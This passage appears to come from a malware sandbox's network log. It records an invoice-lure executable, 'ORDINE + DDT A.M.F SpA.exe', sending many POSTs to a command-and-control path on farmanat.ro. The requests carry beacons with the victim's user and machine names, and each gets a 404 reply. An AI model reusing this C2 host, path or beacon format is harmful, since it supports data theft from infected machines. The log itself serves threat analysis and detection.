                                              Date: Thu, 25 Nov 2021 09:51:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              38192.168.11.2049874176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:26.412909985 CET6363OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:26.446912050 CET6363OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:26.499762058 CET6364INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              380192.168.11.2050224176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:24.110114098 CET6852OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:24.143414021 CET6852OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:24.195945024 CET6852INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              381192.168.11.2050225176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:24.605767965 CET6853OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:24.639946938 CET6853OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:24.701908112 CET6854INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              382192.168.11.2050226176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:25.134458065 CET6854OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:25.168150902 CET6855OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:25.217587948 CET6855INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              383192.168.11.2050227176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:25.644833088 CET6856OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:25.679064035 CET6856OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:25.729237080 CET6856INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              384192.168.11.2050228176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:26.123163939 CET6857OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:26.157428026 CET6857OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:26.210153103 CET6858INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              385192.168.11.2050229176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:26.626689911 CET6858OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:26.660278082 CET6858OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:26.710566998 CET6859INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              386192.168.11.2050230176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:27.099309921 CET6860OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:27.132802010 CET6860OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:27.182981014 CET6860INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              387192.168.11.2050231176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:27.588196039 CET6861OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:27.622354984 CET6861OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:27.675956011 CET6862INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              388192.168.11.2050232176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:28.063643932 CET6862OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:28.096844912 CET6862OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:28.145936966 CET6863INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              389192.168.11.2050233176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:28.555424929 CET6864OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:28.589751005 CET6864OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:28.639452934 CET6864INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              39192.168.11.2049875176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:27.083163977 CET6364OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:27.117561102 CET6365OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:27.176875114 CET6365INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              390192.168.11.2050234176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:29.050192118 CET6865OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:29.083579063 CET6865OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:29.132563114 CET6866INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              391192.168.11.2050235176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:29.546638012 CET6866OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:29.580894947 CET6866OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:29.630446911 CET6867INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              392192.168.11.2050236176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:30.065751076 CET6868OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:30.099304914 CET6868OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:30.148468018 CET6868INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              393192.168.11.2050237176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:30.571082115 CET6869OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:30.604705095 CET6869OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:30.656665087 CET6869INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              394192.168.11.2050238176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:31.087433100 CET6870OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:31.121891022 CET6870OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:31.172842026 CET6871INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              395192.168.11.2050239176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:31.605421066 CET6872OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:31.638880968 CET6872OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:31.694789886 CET6872INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              396192.168.11.2050240176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:32.121427059 CET6873OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
